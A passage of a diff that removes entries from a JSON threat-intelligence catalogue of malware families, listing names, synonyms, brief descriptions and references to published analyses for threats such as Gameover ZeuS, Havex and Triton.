determine whether or not the DDoS attack succeeded and turn infected systems into a SOCKS/HTTP proxy to route traffic to a remote server.", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://telegra.ph/Analiz-botneta-DarkSky-12-30", - "https://blog.radware.com/security/2018/02/darksky-botnet/", - "https://github.com/ims0rry/DarkSky-botnet" - ] - } - }, - { - "uuid": "3a26ee44-3224-48f3-aefb-3978c972d928", - "value": "NetTraveler", - "description": "", - "meta": { - "synonyms": [ - "TravNet" - ], - "type": [], - "refs": [ - "https://www.proofpoint.com/us/threat-insight/post/nettraveler-apt-targets-russian-european-interests", - "https://cdn.securelist.com/files/2014/07/kaspersky-the-net-traveler-part1-final.pdf" - ] - } - }, - { - "uuid": "38b38f8c-944d-4062-bf35-561e8a81c8d2", - "value": "Crypt0l0cker", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://blog.talosintelligence.com/2017/08/first-look-crypt0l0cker.html" - ] - } - }, - { - "uuid": "aa445513-9616-4f61-a72d-7aff4a10572b", - "value": "Empire Downloader", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://twitter.com/thor_scanner/status/992036762515050496" - ] - } - }, - { - "uuid": "83c3aacc-4d13-4ce2-aced-f11b03f12efe", - "value": "win.flusihoc", - "description": "Available since 2015, Flusihoc is a versatile C++ malware capable of a variety of DDoS attacks as directed by a Command and Control server. Flusihoc communicates with its C2 via HTTP in plain text.", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.arbornetworks.com/blog/asert/the-flusihoc-dynasty-a-long-standing-ddos-botnet/" - ] - } - }, - { - "uuid": "4db94d24-209a-4edd-b175-3a3085739b94", - "value": "Colony", - "description": "", - "meta": { - "synonyms": [ - "Bandios", - "GrayBird" - ], - "type": [], - "refs": [ - "https://twitter.com/anyrun_app/status/976385355384590337", - "https://secrary.com/ReversingMalware/Colony_Bandios/", - "https://pastebin.com/GtjBXDmz" - ] - } - }, - { - "uuid": "d66f466a-e70e-4b62-9a04-d62eb41da15c", - "value": "SeaSalt", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf" - ] - } - }, - { - "uuid": "92960f1f-5099-4e38-a177-14a5e3b8d601", - "value": "Dairy", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf" - ] - } - }, - { - "uuid": "05ddb459-5a2f-44d5-a135-ed3f1e772302", - "value": "Crossrider", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://blog.malwarebytes.com/threat-analysis/2018/04/new-crossrider-variant-installs-configuration-profiles-on-macs/?utm_source=twitter&utm_medium=social" - ] - } - }, - { - "uuid": "e895a0d2-fe4b-4793-9440-9db2d56a97f2", - "value": "JripBot", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/" - ] - } - }, - { - "uuid": "38734f44-ebc4-4250-a20e-5dac0fb5c0ed", - "value": "Socks5 Systemz", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "91af1080-6378-4a90-ba1e-78634cd31efe", - "value": "EtumBot", - "description": "", - "meta": { - "synonyms": [ - "HighTide" - ], - "type": [], - "refs": [ - "https://www.arbornetworks.com/blog/asert/wp-content/uploads/2014/06/ASERT-Threat-Intelligence-Brief-2014-07-Illuminating-Etumbot-APT.pdf", - "https://www.fireeye.com/blog/threat-research/2014/09/darwins-favorite-apt-group-2.html", - "https://www.zscaler.com/blogs/research/cnacom-open-source-exploitation-strategic-web-compromise" - ] - } - }, - { - "uuid": "9cd98c61-0dfa-4af6-b334-65eb43bc8d9d", - "value": "Golroted", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://www.vkremez.com/2017/11/lets-learn-dissecting-golroted-trojans.html" - ] - } - }, - { - "uuid": "eb189fd3-ca39-4bc7-be2d-4ea9e89d9ab9", - "value": "Elirks", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://researchcenter.paloaltonetworks.com/2016/09/mile-tea-cyber-espionage-campaign-targets-asia-pacific-businesses-and-government-agencies/" - ] - } - }, - { - "uuid": "2789b246-d762-4d38-8cc8-302293e314da", - "value": "LogPOS", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://securitykitten.github.io/2015/11/16/logpos-new-point-of-sale-malware-using-mailslots.html" - ] - } - }, - { - "uuid": "dd486e92-54fe-4306-9aab-05863cb6c6e1", - "value": "InnaputRAT", - "description": "InnaputRAT, a RAT capable of exfiltrating files from victim machines, was distributed by threat actors using phishing and Godzilla Loader. The RAT has evolved through multiple variants dating back to 2016. Recent campaigns distributing InnaputRAT beaconed to live C2 as of March 26, 2018.", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://asert.arbornetworks.com/innaput-actors-utilize-remote-access-trojan-since-2016-presumably-targeting-victim-files/" - ] - } - }, - { - "uuid": "c21335f5-b145-4029-b1bc-161362c7ce80", - "value": "PadCrypt", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://johannesbader.ch/2016/03/the-dga-of-padcrypt/", - "https://www.bleepingcomputer.com/news/security/padcrypt-the-first-ransomware-with-live-support-chat-and-an-uninstaller/" - ] - } - }, - { - "uuid": "58ae14a9-c4aa-490c-8404-0eb590f5650d", - "value": "FriedEx", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.welivesecurity.com/2018/01/26/friedex-bitpaymer-ransomware-work-dridex-authors/" - ] - } - }, - { - "uuid": "81ca4876-b4a4-43e9-b8a9-8a88709dd3d2", - "value": "Darkmoon", - "description": "", - "meta": { - "synonyms": [ - "Chymine" - ], - "type": [], - "refs": [ - "http://contagiodump.blogspot.com/2010/01/jan-17-trojan-darkmoonb-exe-haiti.html", - "https://www.f-secure.com/v-descs/trojan-downloader_w32_chymine_a.shtml", - "http://contagiodump.blogspot.com/2010/07/cve-2010-2568-keylogger-win32chyminea.html" - ] - } - }, - { - "uuid": "ffc8c386-e9d6-4889-afdf-ebf37621bc4f", - "value": "Gameover P2P", - "description": "Gameover ZeuS is a peer-to-peer botnet based on components from the earlier ZeuS trojan. According to a report by Symantec, Gameover Zeus has largely been used for banking fraud and distribution of the CryptoLocker ransomware. In early June 2014, the U.S. Department of Justice announced that an international inter-agency collaboration named Operation Tovar had succeeded in temporarily cutting communication between Gameover ZeuS and its command and control servers.", - "meta": { - "synonyms": [ - "ZeuS P2P", - "GOZ" - ], - "type": [], - "refs": [ - "https://www.cert.pl/wp-content/uploads/2015/12/2013-06-p2p-rap_en.pdf", - "http://www.syssec-project.eu/m/page-media/3/zeus_malware13.pdf", - "https://www.wired.com/?p=2171700", - "https://www.justice.gov/opa/pr/us-leads-multi-national-action-against-gameover-zeus-botnet-and-cryptolocker-ransomware", - "https://www.fox-it.com/nl/wp-content/uploads/sites/12/FoxIT-Whitepaper_Blackhat-web.pdf" - ] - } - }, - { - "uuid": "b74747e0-59ac-4adf-baac-78213a234ff5", - "value": "BatchWiper", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://contagiodump.blogspot.com/2012/12/batchwiper-samples.html" - ] - } - }, - { - "uuid": "d9215579-eee0-4e50-9157-dba7c3214769", - "value": "GuiInject", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://sentinelone.com/blogs/analysis-ios-guiinject-adware-library/" - ] - } - }, - { - "uuid": "bcc8e3ef-fc5e-4d44-9011-4d429bac0f26", - "value": "PubNubRAT", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://blog.talosintelligence.com/2018/04/fake-av-investigation-unearths-kevdroid.html" - ] - } - }, - { - "uuid": "fedac411-0638-48dc-8ac5-1b4171fa8a29", - "value": "Magniber", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://blog.malwarebytes.com/threat-analysis/2017/10/magniber-ransomware-exclusively-for-south-koreans/", - "https://www.youtube.com/watch?v=lqWJaaofNf4", - "http://asec.ahnlab.com/1124" - ] - } - }, - { - "uuid": "f7081626-130a-48d5-83a9-759b3ef198ec", - "value": "Murofet", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "8468f2a7-f541-4130-b57a-ea678aa30a0a", - "value": "Mokes", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://securelist.com/from-linux-to-windows-new-family-of-cross-platform-desktop-backdoors-discovered/73503/" - ] - } - }, - { - "uuid": "24fe5fef-6325-4c21-9c35-a0ecd185e254", - "value": "EDA2", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://twitter.com/JaromirHorejsi/status/815861135882780673" - ] - } - }, - { - "uuid": "07a41ea7-17b2-4852-bfd7-54211c477dc0", - "value": "Felismus", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.symantec.com/connect/blogs/sowbug-cyber-espionage-group-targets-south-american-and-southeast-asian-governments" - ] - } - }, - { - "uuid": "a51b82ba-7e32-4a8e-b5d0-8d0441bdcce4", - "value": "SunOrcal", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://researchcenter.paloaltonetworks.com/2017/11/unit42-new-malware-with-ties-to-sunorcal-discovered/", - "http://pwc.blogs.com/cyber_security_updates/2016/03/index.html" - ] - } - }, - { - "uuid": "bdc7cc9c-c46d-4f77-b903-2335cc1a3369", - "value": "Sathurbot", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.welivesecurity.com/2017/04/06/sathurbot-distributed-wordpress-password-attack/" - ] - } - }, - { - "uuid": "aff47054-7130-48ca-aa2c-247bdf44f180", - "value": "Unidentified 029", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "3af9397a-b4f7-467d-93af-b3d77dcfc38d", - "value": "Lambert", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://adelmas.com/blog/longhorn.php", - "https://www.youtube.com/watch?v=jeLd-gw2bWo", - "https://www.symantec.com/connect/blogs/longhorn-tools-used-cyberespionage-group-linked-vault-7", - "https://securelist.com/blog/research/77990/unraveling-the-lamberts-toolkit/" - ] - } - }, - { - "uuid": "127c3d76-6323-4363-93e0-cd06ade0dd52", - "value": "GPCode", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://www.xylibox.com/2011/01/gpcode-ransomware-2010-simple-analysis.html", - "http://www.zdnet.com/article/whos-behind-the-gpcode-ransomware/", - "https://de.securelist.com/analysis/59479/erpresser/", - "ftp://ftp.tuwien.ac.at/languages/php/oldselfphp/internet-security/analysen/index-id-200883584.html", - "https://www.symantec.com/security_response/writeup.jsp?docid=2007-071711-3132-99&tabid=2" - ] - } - }, - { - "uuid": "af338ac2-8103-4419-8393-fb4f3b43af4b", - "value": "Bedep", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "4734c5a4-e63b-4bb4-8c01-ab0c638a6c21", - "value": "HerpesBot", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "5d9a27e7-3110-470a-ac0d-2bf00cac7846", - "value": "Ranbyus", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.welivesecurity.com/2012/12/19/win32spy-ranbyus-modifying-java-code-in-rbs/", - "https://www.welivesecurity.com/2012/06/05/smartcard-vulnerabilities-in-modern-banking-malware/", - "http://www.xylibox.com/2013/01/trojanwin32spyranbyus.html", - "https://www.johannesbader.ch/2015/05/the-dga-of-ranbyus/" - ] - } - }, - { - "uuid": "9b5255c6-44e5-4ec3-bc03-7e00e220c937", - "value": "Nymaim", - "description": "", - "meta": { - "synonyms": [ - "nymain" - ], - "type": [], - "refs": [ - "https://www.cert.pl/en/news/single/nymaim-revisited/" - ] - } - }, - { - "uuid": "4da036c4-b76d-4f25-bc9e-3c5944ad0993", - "value": "Xpan", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://securelist.com/blog/research/78110/xpan-i-am-your-father/", - "https://securelist.com/blog/research/76153/teamxrat-brazilian-cybercrime-meets-ransomware/" - ] - } - }, - { - "uuid": "045df65f-77fe-4880-af34-62ca33936c6e", - "value": "Odinaff", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks" - ] - } - }, - { - "uuid": "9218630d-0425-4b18-802c-447a9322990d", - "value": "Zollard", - "description": "", - "meta": { - "synonyms": [ - "darlloz" - ], - "type": [], - "refs": [ - "https://blogs.cisco.com/security/the-internet-of-everything-including-malware" - ] - } - }, - { - "uuid": "40c66571-164c-4050-9c84-f37c9cd84055", - "value": "Unidentified 020 (Vault7)", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://wikileaks.org/ciav7p1/cms/page_34308128.html" - ] - } - }, - { - "uuid": "7f6cd579-b021-4896-80da-fcc07c35c8b2", - "value": "TorrentLocker", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://www.isightpartners.com/2014/08/analysis-torrentlocker-new-strain-malware-using-components-cryptolocker-cryptowall/", - "http://www.bleepingcomputer.com/forums/t/547708/torrentlocker-ransomware-cracked-and-decrypter-has-been-made/" - ] - } - }, - { - "uuid": "9e8655fc-5bba-4efd-b3c0-db89ee2e0e0b", - "value": "Cutwail", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "8f785ee5-1663-4972-9a64-f02e7c46ba66", - "value": "gamapos", - "description": "", - "meta": { - "synonyms": [ - "pios" - ], - "type": [], - "refs": [ - "http://documents.trendmicro.com/assets/GamaPOS_Technical_Brief.pdf" - ] - } - }, - { - "uuid": "d8295eba-60ef-4900-8091-d694180de565", - "value": "Nautilus", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.ncsc.gov.uk/alerts/turla-group-malware" - ] - } - }, - { - "uuid": "7be3f3b3-5047-4422-ad9d-86a7bc321931", - "value": "X-Agent", - "description": "", - "meta": { - "synonyms": [ - "splm", - "chopstick" - ], - "type": [], - "refs": [ - "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", - "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/", - "https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/", - "http://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf", - "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf" - ] - } - }, - { - "uuid": "af1c99be-e55a-473e-abed-726191e1da05", - "value": "BadEncript", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://twitter.com/PhysicalDrive0/status/833067081981710336" - ] - } - }, - { - "uuid": "8f78a226-1314-4778-9bc2-ca850e9e0037", - "value": "X-Agent", - "description": "", - "meta": { - "synonyms": [ - "Popr-d30" - ], - "type": [], - "refs": [ - "http://blog.crysys.hu/2017/01/technical-details-on-the-fancy-bear-android-malware-poprd30-apk/", - "http://blog.crysys.hu/2017/03/update-on-the-fancy-bear-android-malware-poprd30-apk/" - ] - } - }, - { - "uuid": "6aabb492-e282-40fb-a840-fe4e643ec094", - "value": "Allaple", - "description": "", - "meta": { - "synonyms": [ - "Starman" - ], - "type": [], - "refs": [ - "https://trapx.com/wp-content/uploads/2017/08/White_Paper_TrapX_AllapleWorm.pdf", - "https://researchcenter.paloaltonetworks.com/2014/08/hunting-mutex/" - ] - } - }, - { - "uuid": "dfb745f1-600a-4d31-a3b0-57bd0a72ac2e", - "value": "Naikon", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://securelist.com/analysis/publications/69953/the-naikon-apt/", - "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" - ] - } - }, - { - "uuid": "a517cdd1-6c82-4b29-bdd2-87e281227597", - "value": "FruitFly", - "description": "", - "meta": { - "synonyms": [ - "Quimitchin" - ], - "type": [], - "refs": [ - "https://arstechnica.com/security/2017/01/newly-discovered-mac-malware-may-have-circulated-in-the-wild-for-2-years/", - "https://www.virusbulletin.com/virusbulletin/2017/11/vb2017-paper-offensive-malware-analysis-dissecting-osxfruitflyb-custom-cc-server/", - "https://www.documentcloud.org/documents/4346338-Phillip-Durachinsky-Indictment.html", - "https://arstechnica.com/security/2017/07/perverse-malware-infecting-hundreds-of-macs-remained-undetected-for-years/", - "https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/" - ] - } - }, - { - "uuid": "1df3b58a-e5d2-4d2a-869c-8d4532cc9f52", - "value": "ThumbThief", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://www.welivesecurity.com/2016/03/23/new-self-protecting-usb-trojan-able-to-avoid-detection/" - ] - } - }, - { - "uuid": "c51ee09b-fc2d-41fd-a43b-426a4f337139", - "value": "CCleaner Backdoor", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://blog.avast.com/new-investigations-in-ccleaner-incident-point-to-a-possible-third-stage-that-had-keylogger-capacities", - "https://blog.avast.com/additional-information-regarding-the-recent-ccleaner-apt-security-incident", - "http://www.intezer.com/evidence-aurora-operation-still-active-part-2-more-ties-uncovered-between-ccleaner-hack-chinese-hackers/", - "https://blog.avast.com/avast-threat-labs-analysis-of-ccleaner-incident", - "http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html", - "http://www.intezer.com/evidence-aurora-operation-still-active-supply-chain-attack-through-ccleaner/", - "https://blog.avast.com/progress-on-ccleaner-investigation", - "https://www.wired.com/story/ccleaner-malware-targeted-tech-firms", - "https://blog.avast.com/update-ccleaner-attackers-entered-via-teamviewer", - "https://twitter.com/craiu/status/910148928796061696", - "https://www.crowdstrike.com/blog/protecting-software-supply-chain-deep-insights-ccleaner-backdoor/", - "http://blog.morphisec.com/morphisec-discovers-ccleaner-backdoor", - "https://www.crowdstrike.com/blog/in-depth-analysis-of-the-ccleaner-backdoor-stage-2-dropper-and-its-payload/", - "http://blog.talosintelligence.com/2017/09/ccleaner-c2-concern.html" - ] - } - }, - { - "uuid": "1a4f99cc-c078-41f8-9749-e1dc524fc795", - "value": "ARS VBS Loader", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.flashpoint-intel.com/blog/meet-ars-vbs-loader/", - "https://twitter.com/Racco42/status/1001374490339790849" - ] - } - }, - { - "uuid": "94793dbc-3649-40a4-9ccc-1b32846ecb3a", - "value": "Nocturnal Stealer", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.proofpoint.com/us/threat-insight/post/thief-night-new-nocturnal-stealer-grabs-data-cheap" - ] - } - }, - { - "uuid": "72961adc-ace1-4593-99f1-266119ddeccb", - "value": "Unidentified 001", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "fd9904a6-6e06-4b50-8bfd-64ffb793d4a4", - "value": "ThunderShell", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://github.com/Mr-Un1k0d3r/ThunderShell" - ] - } - }, - { - "uuid": "857e61fe-ccb2-426b-ad7b-696112f48dbb", - "value": "Karagany", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group" - ] - } - }, - { - "uuid": "ef4383f6-29fd-4b06-9a1f-b788567fd8fd", - "value": "Ghole", - "description": "", - "meta": { - "synonyms": [ - "CoreImpact (Modified)" - ], - "type": [], - "refs": [ - "http://www.trendmicro.it/media/wp/operation-woolen-goldfish-whitepaper-en.pdf", - "https://www.coresecurity.com/core-impact" - ] - } - }, - { - "uuid": "989330e9-52da-4489-888b-686429db3a45", - "value": "ZhMimikatz", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" - ] - } - }, - { - "uuid": "ab2a63f1-1afd-44e7-9cf4-c775dbee78f4", - "value": "Vreikstadi", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://twitter.com/malware_traffic/status/821483557990318080" - ] - } - }, - { - "uuid": "1a1fd8f1-1fe4-4dc7-bbef-ad0563db3010", - "value": "win.phorpiex", - "description": "Proofpoint describes Phorpiex/Trik as a SDBot fork (thus IRC-based) that has been used to distribute GandCrab, Pushdo, Pony, and coinminers. The name Trik is derived from PDB strings.", - "meta": { - "synonyms": [ - "Trik" - ], - "type": [], - "refs": [ - "https://www.johannesbader.ch/2016/02/phorpiex/", - "https://blog.trendmicro.com/trendlabs-security-intelligence/shylock-not-the-lone-threat-targeting-skype/", - "https://www.bleepingcomputer.com/news/security/trik-spam-botnet-leaks-43-million-email-addresses/", - "https://www.proofpoint.com/us/threat-insight/post/phorpiex-decade-spamming-shadows" - ] - } - }, - { - "uuid": "246060e5-1685-4e97-a6c6-994b3879c8fa", - "value": "Crisis", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.intego.com/mac-security-blog/new-apple-mac-trojan-called-osxcrisis-discovered-by-intego-virus-team/?", - "http://contagiodump.blogspot.com/2012/12/aug-2012-w32crisis-and-osxcrisis-jar.html", - "https://www.symantec.com/connect/blogs/crisis-windows-sneaks-virtual-machines" - ] - } - }, - { - "uuid": "82ab5235-a71e-4692-a08c-8db337d8b53a", - "value": "Stinger", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "c7ab9e5a-0ec9-481e-95ec-ad08f06cf985", - "value": "HTML5 Encoding", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.welivesecurity.com/2017/06/06/turlas-watering-hole-campaign-updated-firefox-extension-abusing-instagram/" - ] - } - }, - { - "uuid": "ce25929c-0358-477c-a85e-f0bdfcc99a54", - "value": "AMTsol", - "description": "", - "meta": { - "synonyms": [ - "Adupihan" - ], - "type": [], - "refs": [ - "https://blogs.technet.microsoft.com/mmpc/2017/06/07/platinum-continues-to-evolve-find-ways-to-maintain-invisibility/", - "http://download.microsoft.com/download/2/2/5/225BFE3E-E1DE-4F5B-A77B-71200928D209/Platinum%20feature%20article%20-%20Targeted%20attacks%20in%20South%20and%20Southeast%20Asia%20April%202016.pdf" - ] - } - }, - { - "uuid": "c6a46f63-3ff1-4952-8350-fad9816b45c9", - "value": "CsExt", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" - ] - } - }, - { - "uuid": "0884cf65-564e-4ee2-b4e5-b73f8bbd6a34", - "value": "Thanatos Ransomware", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://blog.talosintelligence.com/2018/06/ThanatosDecryptor.html", - "https://www.bleepingcomputer.com/news/security/thanatos-ransomware-is-first-to-use-bitcoin-cash-messes-up-encryption/", - "https://www.bleepingcomputer.com/news/security/thanatos-ransomware-decryptor-released-by-the-cisco-talos-group/" - ] - } - }, - { - "uuid": "7368ab0c-ef4b-4f53-a746-f150b8afa665", - "value": "DiamondFox", - "description": "", - "meta": { - "synonyms": [ - "Crystal", - "Gorynch", - "Gorynych" - ], - "type": [], - "refs": [ - "https://blog.malwarebytes.com/threat-analysis/2017/03/diamond-fox-p1/", - "http://blog.checkpoint.com/2017/05/10/diamondfox-modular-malware-one-stop-shop/", - "https://www.scmagazine.com/inside-diamondfox/article/578478/", - "https://blog.cylance.com/a-study-in-bots-diamondfox", - "https://blog.malwarebytes.com/threat-analysis/2017/04/diamond-fox-p2/" - ] - } - }, - { - "uuid": "7eeafa7c-0282-4667-bb1a-5ebc3a845d6d", - "value": "Spora", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://nakedsecurity.sophos.com/2017/06/26/how-spora-ransomware-tries-to-fool-antivirus/", - "https://blog.malwarebytes.com/threat-analysis/2017/03/spora-ransomware/", - "https://www.linkedin.com/pulse/spora-ransomware-understanding-hta-infection-vector-kevin-douglas", - "https://www.gdatasoftware.com/blog/2017/01/29442-spora-worm-and-ransomware", - "https://github.com/MinervaLabsResearch/SporaVaccination", - "http://malware-traffic-analysis.net/2017/01/17/index2.html" - ] - } - }, - { - "uuid": "c8a7c6e7-c6d3-4978-8a1d-190162de5e0d", - "value": "Matryoshka RAT", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://www.clearskysec.com/tulip/" - ] - } - }, - { - "uuid": "168bf2a1-45a5-41ac-b364-5740e7ce9757", - "value": "Unidentified 042", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://www.intezer.com/lazarus-group-targets-more-cryptocurrency-exchanges-and-fintech-companies/" - ] - } - }, - { - "uuid": "d2414f4a-1eda-4d80-84d3-ed130ca14e3c", - "value": "TinyTyphon", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf" - ] - } - }, - { - "uuid": "d674ffd2-1f27-403b-8fe9-b4af6e303e5c", - "value": "Uroburos", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://blog.fox-it.com/2017/05/03/snake-coming-soon-in-mac-os-x-flavour/", - "https://blog.malwarebytes.com/threat-analysis/2017/05/snake-malware-ported-windows-mac/" - ] - } - }, - { - "uuid": "ec0cad2c-0c13-491a-a869-1dc1758c8872", - "value": "NavRAT", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://blog.talosintelligence.com/2018/05/navrat.html?m=1" - ] - } - }, - { - "uuid": "55d5742e-20f5-4c9a-887a-4dbd5b37d921", - "value": "CryptoMix", - "description": "", - "meta": { - "synonyms": [ - "CryptFile2" - ], - "type": [], - "refs": [ - "https://www.bleepingcomputer.com/news/security/work-cryptomix-ransomware-variant-released/", - "https://www.cert.pl/en/news/single/technical-analysis-of-cryptomixcryptfile2-ransomware/" - ] - } - }, - { - "uuid": "c04fc02e-f35a-44b6-a9b0-732bf2fc551a", - "value": "Havex RAT", - "description": "Havex is a remote access trojan (RAT) that was discovered in 2013 as part of a widespread espionage campaign targeting industrial control systems (ICS) used across numerous industries and attributed to a hacking group referred to as \"Dragonfly\" and \"Energetic Bear\". Havex is estimated to have impacted thousands of infrastructure sites, a majority of which were located in Europe and the United States. Within the energy sector, Havex specifically targeted energy grid operators, major electricity generation firms, petroleum pipeline operators, and industrial equipment providers. Havex also impacted organizations in the aviation, defense, pharmaceutical, and petrochemical industries.\r\n\r\nOnce installed, Havex scanned the infected system to locate any Supervisory Control and Data Acquisition (SCADA) or ICS devices on the network and sent the data back to command and control servers. To do so, the malware leveraged the Open Platform Communications (OPC) standard, which is a universal communication protocol used by ICS components across many industries that facilitates open connectivity and vendor equipment interoperability. Havex used the Distributed Component Object Model (DCOM) to connect to OPC servers inside of an ICS network and collect information such as CLSID, server name, Program ID, OPC version, vendor information, running state, group count, and server bandwidth.\r\n\r\nHavex was an intelligence-collection tool used for espionage and not for the disruption or destruction of industrial systems. However, the data collected by Havex would have aided efforts to design and develop attacks against specific targets or industries.", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.f-secure.com/weblog/archives/00002718.html" - ] - } - }, - { - "uuid": "3b6c1771-6d20-4177-8be0-12116e254bf5", - "value": "GhostCtrl", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://blog.trendmicro.com/trendlabs-security-intelligence/android-backdoor-ghostctrl-can-silently-record-your-audio-video-and-more/" - ] - } - }, - { - "uuid": "0f02ea79-5833-46e0-8458-c4a863a5a112", - "value": "Jaku", - "description": "", - "meta": { - "synonyms": [ - "Reconcyc" - ], - "type": [], - "refs": [ - "https://www.forcepoint.com/sites/default/files/resources/files/report_jaku_analysis_of_botnet_campaign_en_0.pdf", - "https://www-01.ibm.com/support/docview.wss?uid=ssg1S1010146" - ] - } - }, - { - "uuid": "79606b2b-72f0-41e3-8116-1093c1f94b15", - "value": "win.triton", - "description": "Malware attacking commonly used in Industrial Control Systems (ICS) Triconex Safety Instrumented System (SIS) controllers.", - "meta": { - "synonyms": [ - "Trisis", - "HatMan" - ], - "type": [], - "refs": [ - "https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html", - "https://www.midnightbluelabs.com/blog/2018/1/16/analyzing-the-triton-industrial-malware", - "https://github.com/ICSrepo/TRISIS-TRITON-HATMAN", - "https://ics-cert.us-cert.gov/sites/default/files/documents/MAR-17-352-01%20HatMan%E2%80%94Safety%20System%20Targeted%20Malware_S508C.pdf", - "https://dragos.com/blog/trisis/TRISIS-01.pdf" - ] - } - }, - { - "uuid": "9af26655-cfba-4e02-bd10-ad1a494e0b5f", - "value": "Helauto", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf" - ] - } - }, - { - "uuid": "1eceb5c0-3a01-43c2-b204-9957b15cf763", - "value": "badflick", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html" - ] - } - }, - { - "uuid": 